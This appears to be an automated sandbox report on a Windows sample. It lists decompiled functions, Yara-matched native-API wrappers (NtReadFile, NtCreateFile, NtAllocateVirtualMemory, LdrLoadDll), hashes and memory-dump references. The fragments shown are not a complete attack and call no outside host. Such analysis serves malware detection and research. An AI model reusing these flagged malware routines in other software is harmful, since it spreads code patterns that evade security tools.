                                                                                        0x73761170
                                                                                        0x73761179
                                                                                        0x7376117e
                                                                                        0x7376117e
                                                                                        0x00000000
                                                                                        0x73761153
                                                                                        0x7376113a
                                                                                        0x737611d1
                                                                                        0x737611d1
                                                                                        0x737611d8
                                                                                        0x737611e5
                                                                                        0x737611ea
                                                                                        0x737611ef
                                                                                        0x737611f5
                                                                                        0x737611fb
                                                                                        0x737611fb
                                                                                        0x00000000
                                                                                        0x737611d8
                                                                                        0x73761140
                                                                                        0x73761143
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761149
                                                                                        0x7376114c
                                                                                        0x7376119b
                                                                                        0x00000000
                                                                                        0x7376119b
                                                                                        0x7376114f
                                                                                        0x73761150
                                                                                        0x73761183
                                                                                        0x00000000
                                                                                        0x73761183
                                                                                        0x00000000
                                                                                        0x737611ba
                                                                                        0x737611ba
                                                                                        0x00000000
                                                                                        0x737611c3

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: bb901e6445d60b9380e54c5074241db2af107d9f746423a780867baf8a88228c
                                                                                        • Instruction ID: ec5e91ad6214a9eac87f2cade7ef62abc450c4afa01181cf4031bcc6a1003ed3
                                                                                        • Opcode Fuzzy Hash: bb901e6445d60b9380e54c5074241db2af107d9f746423a780867baf8a88228c
                                                                                        • Instruction Fuzzy Hash: 2831B0B250476AEFE706EF66DA7DB257FF9EB05240B284555EC4ACB250D738C800CB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                        0x004057be
                                                                                        0x004057c0
                                                                                        0x004057e8
                                                                                        0x004057cd
                                                                                        0x004057d2
                                                                                        0x004057dd
                                                                                        0x00000000
                                                                                        0x004057fa
                                                                                        0x004057e6
                                                                                        0x004057e6
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                        • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                        • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                        • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Analysis Process: SX365783909782021.exe PID: 5472 Parent PID: 4092 SX365783909782021.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 37%
                                                                                        			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                        0x00419fe3
                                                                                        0x00419fef
                                                                                        0x00419ff7
                                                                                        0x0041a002
                                                                                        0x0041a01d
                                                                                        0x0041a025
                                                                                        0x0041a029

                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID: BMA$BMA
                                                                                        • API String ID: 2738559852-2163208940
                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C820( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC40(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEC0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B070(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                        0x0040acec
                                                                                        0x0040acef
                                                                                        0x0040acf4
                                                                                        0x0040acf9
                                                                                        0x0040ad03
                                                                                        0x0040ad08
                                                                                        0x0040ad0b
                                                                                        0x0040ad0d
                                                                                        0x0040ad15
                                                                                        0x0040ad1a
                                                                                        0x0040ad1a
                                                                                        0x0040ad21
                                                                                        0x0040ad29
                                                                                        0x0040ad2c
                                                                                        0x0040ad2e
                                                                                        0x0040ad42
                                                                                        0x00000000
                                                                                        0x0040ad44
                                                                                        0x0040ad4a
                                                                                        0x0040acfe
                                                                                        0x0040acfe
                                                                                        0x0040acfe

                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                        • Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
                                                                                        • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                        • Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419F2D, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00419F2D(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				_t17 = _a4;
				_t3 = _t17 + 0xc40; // 0xc40
				E0041AB30(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}





                                                                                        0x00419f33
                                                                                        0x00419f3f
                                                                                        0x00419f47
                                                                                        0x00419f7d
                                                                                        0x00419f81

                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 1f7eadc41332b9ec5f63a0cd7e40ecd3791a9612f597a1961f5fd02968305a70
                                                                                        • Instruction ID: e8e4334a40ba753a7cf6667cd5e0c96857fed7817421462eec1333f854f627e9
                                                                                        • Opcode Fuzzy Hash: 1f7eadc41332b9ec5f63a0cd7e40ecd3791a9612f597a1961f5fd02968305a70
                                                                                        • Instruction Fuzzy Hash: 7FF0CFB2205108AFCB08CF88DC94EEB37EAAF8C354F158248FA0DD7250C630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                        0x00419f3f
                                                                                        0x00419f47
                                                                                        0x00419f7d
                                                                                        0x00419f81

                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A10A, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0041A10A(void* __ecx, void* __edx, void* __edi, intOrPtr _a7, void* _a11, PVOID* _a15, long _a19, long* _a23, long _a27, long _a31) {
				void* _v117;
				long _t15;
				void* _t28;

				_t28 = __edi - 1;
				_t11 = _a7;
				_t4 = _t11 + 0xc60; // 0xca0
				E0041AB30(_t28, _a7, _t4,  *((intOrPtr*)(_a7 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a11, _a15, _a19, _a23, _a27, _a31); // executed
				return _t15;
			}






                                                                                        0x0041a10b
                                                                                        0x0041a113
                                                                                        0x0041a11f
                                                                                        0x0041a127
                                                                                        0x0041a149
                                                                                        0x0041a14d

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 1d5a81cfd151367fc0bce4fe3640ed1e662240835a40f3b475edbe425ba09f70
                                                                                        • Instruction ID: 6440b650d6cc59e1d5f6f61ac35dfdf62c2ddfd411072ef6a6e3ad49f8e4332e
                                                                                        • Opcode Fuzzy Hash: 1d5a81cfd151367fc0bce4fe3640ed1e662240835a40f3b475edbe425ba09f70
                                                                                        • Instruction Fuzzy Hash: D6F058B2210108ABCB14DF99DC92EEB77A9EF88364F108649FA4C97241C635E851CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                        0x0041a11f
                                                                                        0x0041a127
                                                                                        0x0041a149
                                                                                        0x0041a14d

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                        • Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                        • Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0041A060(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                        0x0041a063
                                                                                        0x0041a066
                                                                                        0x0041a06f
                                                                                        0x0041a077
                                                                                        0x0041a085
                                                                                        0x0041a089

                                                                                        APIs
                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A05A, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 68%
                                                                                        			E0041A05A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("adc ch, [ecx-0x31]");
				asm("psubsb mm7, [edi-0x741374ab]");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                        0x0041a05a
                                                                                        0x0041a05d
                                                                                        0x0041a063
                                                                                        0x0041a066
                                                                                        0x0041a06f
                                                                                        0x0041a077
                                                                                        0x0041a085
                                                                                        0x0041a089

                                                                                        APIs
                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 71f7f6a40dc47dba60c6b675ae96e15bec8c2ce5f9ff55a87447ad0a70b37199
                                                                                        • Instruction ID: ffda02daeddc00931dbb56ac11234dcaaf4f8aa3b80b9e9e7b0103f3ce44bfc0
                                                                                        • Opcode Fuzzy Hash: 71f7f6a40dc47dba60c6b675ae96e15bec8c2ce5f9ff55a87447ad0a70b37199
                                                                                        • Instruction Fuzzy Hash: 5FE02BA940D2C04FC753FBB4A4E00C6BF50DE912283284ACFD8E807603C63AE21AD791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 005e8e1a233bc3bd6dfc912925eb76541e309b72dd5dbe1d61ddb5288bc32c0c
                                                                                        • Instruction ID: c27a4561e803e0f04d359ffacba0908fa19eda89cabd49e05768b59ac0fa7c1f
                                                                                        • Opcode Fuzzy Hash: 005e8e1a233bc3bd6dfc912925eb76541e309b72dd5dbe1d61ddb5288bc32c0c
                                                                                        • Instruction Fuzzy Hash: 5B9002A160101602D60171594414656050A97D1381FA1C432A1024555ECA6589D2F1B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0e8a11c6cade026bb422b9178a0138a09798a09982f574048ebde093c5ec2529
                                                                                        • Instruction ID: cc74d07f65fe694645a4f6e5fc9186b5ba648c17982142728bfe2546cdb8fa23
                                                                                        • Opcode Fuzzy Hash: 0e8a11c6cade026bb422b9178a0138a09798a09982f574048ebde093c5ec2529
                                                                                        • Instruction Fuzzy Hash: 3F9002A1242052525A45B15944145474506A7E13817A1C422A1414950C85669896F6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: dccdbeba3398d24374e69f6b8044628e318021f60e58c4b36163f0c189cdd8f7
                                                                                        • Instruction ID: 371b643bcaf11e6e7fe2b2e60e6c2848a0ba8f046d0e7a69ec9fd2df1e8bdb4d
                                                                                        • Opcode Fuzzy Hash: dccdbeba3398d24374e69f6b8044628e318021f60e58c4b36163f0c189cdd8f7
                                                                                        • Instruction Fuzzy Hash: EE9002B120101513D61161594514747050997D1381FA1C822A0424558D96968992F1A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 80b8dc8733fac95c6cc3f1d50d40e242943d3955d8eaf89c6ae651cc866375f4
                                                                                        • Instruction ID: 698aa20b6e9f7f18602bca2e4c313b6c302e548478fc577128157d892b51f35c
                                                                                        • Opcode Fuzzy Hash: 80b8dc8733fac95c6cc3f1d50d40e242943d3955d8eaf89c6ae651cc866375f4
                                                                                        • Instruction Fuzzy Hash: BB9002E134101542D60061594424B460505D7E2341F61C425E1064554D8659CC92B1A6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 88a314358245ef3c42c05cae38e83d30588f2ee0b800ee8811f4aded23744779
                                                                                        • Instruction ID: cbc47928a1f4ea1e0b6532080f564bf861f1bea910711f7c5891f767f44df81b
                                                                                        • Opcode Fuzzy Hash: 88a314358245ef3c42c05cae38e83d30588f2ee0b800ee8811f4aded23744779
                                                                                        • Instruction Fuzzy Hash: 649002F120101502D64071594414786050597D1341F61C421A5064554E86998DD5B6E5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d7817e0bb1838211862860a8cbce830eb95f37476abef3f530292b33b209e0c4
                                                                                        • Instruction ID: 4689fd897e3a2e30d92b494e978d0ce20491503a91d44dc2f5bfd8643844c8b9
                                                                                        • Opcode Fuzzy Hash: d7817e0bb1838211862860a8cbce830eb95f37476abef3f530292b33b209e0c4
                                                                                        • Instruction Fuzzy Hash: E49002A121181142D70065694C24B47050597D1343F61C525A0154554CC95588A1B5A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: a2e190b6a975b5b38fa2daef8847472c6058372336920bcae952d9873aa76e1f
                                                                                        • Instruction ID: 7fdd94da0ee7281121322645743b9cb19cedb762040ddd4af0bb31a2a57be19f
                                                                                        • Opcode Fuzzy Hash: a2e190b6a975b5b38fa2daef8847472c6058372336920bcae952d9873aa76e1f
                                                                                        • Instruction Fuzzy Hash: ED9002B120141502D6006159482474B050597D1342F61C421A1164555D86658891B5F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: eaecfabb9e4b0756434e2bd96c59f100ece8078a978058c741f03db89dbe9713
                                                                                        • Instruction ID: 663357327e39742931b737335c9eae829cb1c762a34f79ab662522e55db917a7
                                                                                        • Opcode Fuzzy Hash: eaecfabb9e4b0756434e2bd96c59f100ece8078a978058c741f03db89dbe9713
                                                                                        • Instruction Fuzzy Hash: CB9002A1601011424640716988549464505BBE2351761C531A0998550D859988A5B6E5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0a11d2e4728e13e9c1c214a9b0196cdc6aabcda4a6f265af1c94932cfc327345
                                                                                        • Instruction ID: 06cbdd3dbe990d9e87c9d01e47239ba9af27a0fceb7395c66449e4b7f401116b
                                                                                        • Opcode Fuzzy Hash: 0a11d2e4728e13e9c1c214a9b0196cdc6aabcda4a6f265af1c94932cfc327345
                                                                                        • Instruction Fuzzy Hash: 229002E120201103460571594424656450A97E1341B61C431E1014590DC56588D1B1A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
